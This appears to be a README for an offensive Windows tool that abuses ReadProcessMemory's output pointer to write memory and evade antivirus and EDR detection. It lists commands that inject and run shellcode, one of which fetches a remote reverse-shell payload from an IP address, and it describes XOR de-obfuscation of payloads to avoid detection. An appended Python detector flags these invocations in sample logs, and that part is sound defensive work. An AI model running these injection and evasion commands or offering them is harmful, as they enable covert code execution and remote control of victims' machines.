CopyReadProcessMemory

Description

CopyReadProcessMemory exploits the misconfiguration/vulnerability present in the Windows API function ReadProcessMemory, discovered by DarkCoderSc.

It exploits the nature of the in/out pointer parameter named *lpNumberOfBytesRead, which makes it possible to write into process memory without calling the common API methods used for that purpose, such as memcpy; this is perfect for AV and EDR detection evasion.

BOOL ReadProcessMemory(
  [in]  HANDLE  hProcess,
  [in]  LPCVOID lpBaseAddress,
  [out] LPVOID  lpBuffer,
  [in]  SIZE_T  nSize,
  [out] SIZE_T  *lpNumberOfBytesRead      // <-- vulnerable parameter
);

This tool can be used directly in red team operations as a POC.

Download

Just go to the release section of the repo and download the latest version:

https://github.com/chmod760/CopyReadProcessMemory/releases/tag/Stable-1.0

Usage

The main options of the program are the following:

CopyReadProcessMemory.exe -h

Usage:
  CopyReadProcessMemory [OPTIONS]

Modes (choose exactly one):
  -s, --string_inject <STRING>      Inject a raw string
  -f, --file_path <FILE>            Load payload from file
  -t, --remote_payload <TARGET>     Use remote payload

Options:
  -e, --execute                     Execute payload after processing
  -x, --xor                         XOR key to decode the shellcode
  -h, --help                        Show this help
  -V, --version                     Show version

There are (at least) three possible attack scenarios:

Remote shellcode in-memory injection & execution

CopyReadProcessMemory.exe -t http://192.168.1.140:8081/reverse.bin -e

Command-line shellcode injection & execution

CopyReadProcessMemory.exe  -s "Copy Using ReadProcessMemory"

Shellcode injection & execution from an external file

CopyReadProcessMemory.exe -f "C:\Users\Public\Download\reverse.bin" -e

Payload De-obfuscation

From an attacker's perspective, dropping raw shellcode on a system usually means instant detection and failure. Because of this, attackers often obfuscate or encrypt their shellcode to avoid being flagged by AV/EDR solutions, which means it has to be decrypted or de-obfuscated in memory. To support this workflow, I added an extra feature that de-obfuscates the payload via the -x argument, which takes the key used to XOR it.

CopyReadProcessMemory.exe -f C:\Users\Public\Downloads\reverse.bin_xored -e -x chmod760

It can also be applied to the other features described earlier in this document.

Additionally, a Python script is included to help with payload obfuscation.
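From the defender's side, the -h output and the three usage scenarios above give a clear command-line signature. The following is an added example, not part of this repository: a small classifier that pulls the CommandLine field out of constructed, Sysmon-like process-creation log lines (assumed format) and rates each invocation of the tool by mode, payload source, the -e flag and the -x key.

```python
import re

# Mode and option flags as listed in the tool's -h output above.
MODE_FLAGS = {"-s": "string", "--string_inject": "string", "-f": "file",
              "--file_path": "file", "-t": "remote", "--remote_payload": "remote"}
EXEC_FLAGS = {"-e", "--execute"}
XOR_FLAGS = {"-x", "--xor"}

def classify(cmdline):
    """Return None unless the command line invokes this tool; else a finding dict."""
    # Split the command line, keeping quoted arguments (the -s payload) together.
    toks = [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]
    if not toks or "copyreadprocessmemory" not in toks[0].lower():
        return None
    f = {"mode": None, "source": None, "execute": False, "xor": False, "severity": "low"}
    i = 1
    while i < len(toks):
        t = toks[i]
        if t in MODE_FLAGS:
            f["mode"] = MODE_FLAGS[t]
            f["source"] = toks[i + 1] if i + 1 < len(toks) else None
            i += 1  # skip the mode's value
        elif t in EXEC_FLAGS:
            f["execute"] = True
        elif t in XOR_FLAGS:
            f["xor"] = True
            i += 1  # skip the XOR key
        i += 1
    # Fetching or decoding a payload and then executing it is the strongest signal;
    # an injection without -e still warrants a medium-severity alert.
    if f["execute"] and f["mode"] in ("remote", "file"):
        f["severity"] = "high"
    elif f["mode"] is not None:
        f["severity"] = "medium"
    return f

def scan(log_lines):
    """Pull the CommandLine= field out of each log line and classify it."""
    matches = [re.search(r"CommandLine=(.*)$", line) for line in log_lines]
    return [f for f in (classify(m.group(1)) for m in matches if m) if f]

# Constructed sample process-creation log lines (Sysmon-like, not real telemetry).
SAMPLE_LOG = [
    r"EventID=1 Image=C:\Users\Public\CopyReadProcessMemory.exe CommandLine=CopyReadProcessMemory.exe -t http://192.168.1.140:8081/reverse.bin -e",
    r'EventID=1 Image=C:\Users\Public\CopyReadProcessMemory.exe CommandLine=CopyReadProcessMemory.exe -s "Copy Using ReadProcessMemory"',
    r"EventID=1 Image=C:\Users\Public\CopyReadProcessMemory.exe CommandLine=CopyReadProcessMemory.exe -f C:\Users\Public\Downloads\reverse.bin_xored -e -x chmod760",
    r"EventID=1 Image=C:\Windows\System32\notepad.exe CommandLine=notepad.exe C:\notes.txt",
]
```

Running scan(SAMPLE_LOG) yields three findings (high, medium, high) and ignores the notepad line; a renamed binary defeats the image-name check, so pair this with telemetry on the ReadProcessMemory primitive itself.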

Credits

Big kudos to Jean-Pierre LESUEUR (DarkCoderSc) for discovering the pointer vulnerability and posting it on the unprotect.it project; you can contact him here:

https://unprotect.it/users/public/profile/darkcodersc/
